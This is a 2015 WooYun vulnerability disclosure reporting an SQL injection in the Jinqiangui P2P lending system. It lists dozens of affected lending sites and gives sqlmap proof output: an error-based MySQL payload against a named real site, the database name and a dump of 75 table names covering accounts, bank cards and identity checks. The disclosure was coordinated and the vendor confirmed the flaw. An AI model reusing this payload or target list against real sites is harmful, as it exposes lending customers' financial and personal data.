当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133935

漏洞标题:金钱柜网贷系统又一SQL注入漏洞可影响大量网贷站点

相关厂商:山东金钱柜网络科技有限公司

漏洞作者: 路人甲

提交时间:2015-08-13 19:35

修复时间:2015-11-13 12:56

公开时间:2015-11-13 12:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商已经确认,细节仅向厂商公开
2015-08-18: 细节向第三方安全合作伙伴开放
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

上一个注入漏洞修复,又找出一个注入漏洞

详细说明:

影响网站

http://www.kkkdai.com/invest/full_success/a20150600001.html
http://shunchangcaifu.com/invest/full_success/a20150600004.html
http://wenbangjinrong.com/invest/full_success/a20150500023.html
http://www.zhuoxincf.com/invest/full_success/a20150400033.html
http://www.lurongdai.com/invest/full_success/a20150800007.html
http://www.hengdacaifu.com/invest/full_success/a20150800031.html
http://wangdai168.com/invest/full_success/a20150800009.html
http://www.xuefudai.com/invest/full_success/a20150800007.html
其他受影响域名
http://www.mingfucaifu.com
http://www.donglingdai.com
http://www.zndai.com
http://www.qduoduo.net
http://www.xsbvc.com
http://www.mingyedai.com
http://yolo100.net
http://www.btzhd.com
http://ludongchuangtou.com
http://xinruncaifu.com
http://chengyuecaifu.com
http://leyuancaifu.com
http://zhuoxincf.com
http://www.hengdacaifu.com
http://fuhuajinrong.com
http://donglingdai.com
http://bccht.com
http://qinghuacaifu.com
http://zhengdaguquan.com
http://sdxpct.com
http://miaomiaocaifu.com
http://www.hongshuncaifu.com
http://longmaocaifu.com
http://www.91toufang.com
http://www.yikuaict.com
http://www.jufuyidai.com
http://haohaochuangtou.com
http://www.153mh.com
部分用户不是金钱柜用户

漏洞证明:

sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://shenghaodai.com:80/invest/full_success/a20150800024 AND (SELECT 5926 FROM(SELECT COUNT(*),CONCAT(0x716e6c6a71,(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 0 END)),0x7173656971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://shenghaodai.com:80/invest/full_success/a20150800024 AND (SELECT 5926 FROM(SELECT COUNT(*),CONCAT(0x716e6c6a71,(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 0 END)),0x7173656971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
current database: 'new_jqg2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://shenghaodai.com:80/invest/full_success/a20150800024 AND (SELECT 5926 FROM(SELECT COUNT(*),CONCAT(0x716e6c6a71,(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 0 END)),0x7173656971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: new_jqg2
[75 tables]
+---------------------------------+
| jqg_account |
| jqg_account_balance |
| jqg_account_bank |
| jqg_account_cash |
| jqg_account_log |
| jqg_account_payment |
| jqg_account_recharge |
| jqg_account_users |
| jqg_account_users_bank |
| jqg_account_web |
| jqg_amount_type |
| jqg_approve |
| jqg_approve_edu |
| jqg_approve_edu_id5 |
| jqg_approve_flow |
| jqg_approve_id5 |
| jqg_approve_invite |
| jqg_approve_realname |
| jqg_approve_sms |
| jqg_approve_smslog |
| jqg_approve_video |
| jqg_areas |
| jqg_article_fields |
| jqg_articles |
| jqg_articles_fields |
| jqg_articles_pages |
| jqg_articles_type |
| jqg_attestations |
| jqg_attestations_type |
| jqg_attestations_user |
| jqg_borrow |
| jqg_borrow_amount |
| jqg_borrow_amount_apply |
| jqg_borrow_amount_log |
| jqg_borrow_amount_type |
| jqg_borrow_auto |
| jqg_borrow_autolog |
| jqg_borrow_change |
| jqg_borrow_count |
| jqg_borrow_count_log |
| jqg_borrow_credit |
| jqg_borrow_line |
| jqg_borrow_otherloan |
| jqg_borrow_recover |
| jqg_borrow_repay |
| jqg_borrow_shenqing |
| jqg_borrow_tender |
| jqg_borrow_tender_auto |
| jqg_borrow_tender_autolog |
| jqg_borrow_tender_web |
| jqg_borrow_vouch |
| jqg_borrow_vouch_recover |
| jqg_borrow_vouch_repay |
| jqg_comment |
| jqg_comments |
| jqg_common_admincp_cmenu |
| jqg_common_admincp_group |
| jqg_common_admincp_member |
| jqg_common_admincp_perm |
| jqg_common_admincp_session |
| jqg_common_admingroup |
| jqg_common_adminnote |
| jqg_common_advertisement |
| jqg_common_advertisement_custom |
| jqg_common_banned |
| jqg_common_block |
| jqg_common_block_favorite |
| jqg_common_block_item |
| jqg_common_block_item_data |
| jqg_common_block_permission |
| jqg_common_block_pic |
| jqg_common_block_style |
| jqg_common_block_xml |
| jqg_common_cache |
| jqg_common_card |
+---------------------------------+
中间出错,390多张表,只出来这些,其他换ip可以继续搞,只为证明,不深入

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-15 12:54

厂商回复:

感谢对我们的支持。谢谢!

最新状态:

暂无


漏洞评价:

评论